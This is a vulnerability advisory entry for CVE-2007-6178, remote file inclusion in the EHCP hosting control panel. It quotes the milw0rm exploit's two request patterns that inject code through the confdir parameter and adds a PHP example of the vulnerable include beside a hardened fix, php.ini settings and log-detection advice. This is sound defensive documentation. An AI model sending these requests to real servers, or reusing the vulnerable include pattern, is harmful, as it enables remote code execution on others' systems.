Ubuntu easy hosting control panel: multiple remote file inclusion vulnerabilities

Vulnerability ID: 1114013    Vulnerability type: input validation
Published: 2007-11-28    Updated: 2008-09-22
CVE: CVE-2007-6178    CNNVD ID: CNNVD-200711-404
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/4671
https://www.securityfocus.com/bid/26623
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-404
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in Easy Hosting Control Panel (EHCP) 0.22.8 and earlier for Ubuntu. A remote attacker can execute arbitrary PHP code via a URL supplied in the confdir parameter of (1) dbutil.bck.php and (2) dbutil.php in config/.
|Vulnerability EXP
---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                           
---------------------------------------------------------------

Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	

---------------------------------------------------------------

	  Multiple Remote File Inclusion

---------------------------------------------------------------

# Author: MhZ91 nobody.91@hotmail.it 

# Download Script: http://sourceforge.net/projects/ehcp

# register_globals = On 

# Exploit 

# http://[site]/[path]/config/dbutil.bck.php?confdir=[Evil_Code]

# http://[site]/[path]/config/dbutil.php?confdir=[Evil_Code]

---------------------------------------------------------------

# milw0rm.com [2007-11-28]
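The advisory above only gives the request pattern; the snippet below is an added illustration (not EHCP's own code, file and variable names are assumed) of the include pattern that makes a confdir parameter exploitable under register_globals=On, next to a hardened replacement that never builds an include path from request data.

```php
<?php
// Added illustration of the CVE-2007-6178 pattern; not code from EHCP.
// Assumed layout: this file lives in config/ next to dbconfig.php.

// VULNERABLE: with register_globals=On, ?confdir=http://example.invalid/
// pre-populates $confdir from the query string, and include() will fetch
// and execute remote PHP when allow_url_include/allow_url_fopen permit it.
function load_config_vulnerable()
{
    global $confdir;                       // set by the request, not by this file
    if (!isset($confdir)) {
        $confdir = dirname(__FILE__);      // only reached when the client sent nothing
    }
    include($confdir . '/dbconfig.php');
}

// HARDENED: the directory is fixed relative to this file, the only variable
// part is a name checked against an allowlist, and the resolved path must
// stay inside the config directory.
define('EHCP_CONF_DIR', dirname(__FILE__)); // assumed config directory

function load_config_hardened($name = 'dbconfig')
{
    $allowed = array('dbconfig', 'dbutil');
    if (!in_array($name, $allowed, true)) {
        throw new RuntimeException('unknown config name');
    }
    $base = realpath(EHCP_CONF_DIR);
    $path = realpath(EHCP_CONF_DIR . '/' . $name . '.php');
    // realpath() resolves ../ and symlinks and returns false for missing
    // files and for URLs, so anything outside $base is rejected here.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('config path outside config directory');
    }
    include $path;
}

// Matching php.ini settings for the deployment (the fix in code above still
// applies even where these are off):
//   register_globals = Off
//   allow_url_include = Off
```

Requests with a scheme (http://, ftp://) or path traversal in confdir are worth alerting on in web server logs, since this is exactly the request shape the advisory describes.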
|Affected products
EHCP ehcp - easy hosting control panel 0.22.8
|References

Source: MILW0RM
Name: 4671
Link: http://www.milw0rm.com/exploits/4671
Source: XF
Name: ehcp-confdir-file-include(38698)
Link: http://xforce.iss.net/xforce/xfdb/38698
Source: BID
Name: 26623
Link: http://www.securityfocus.com/bid/26623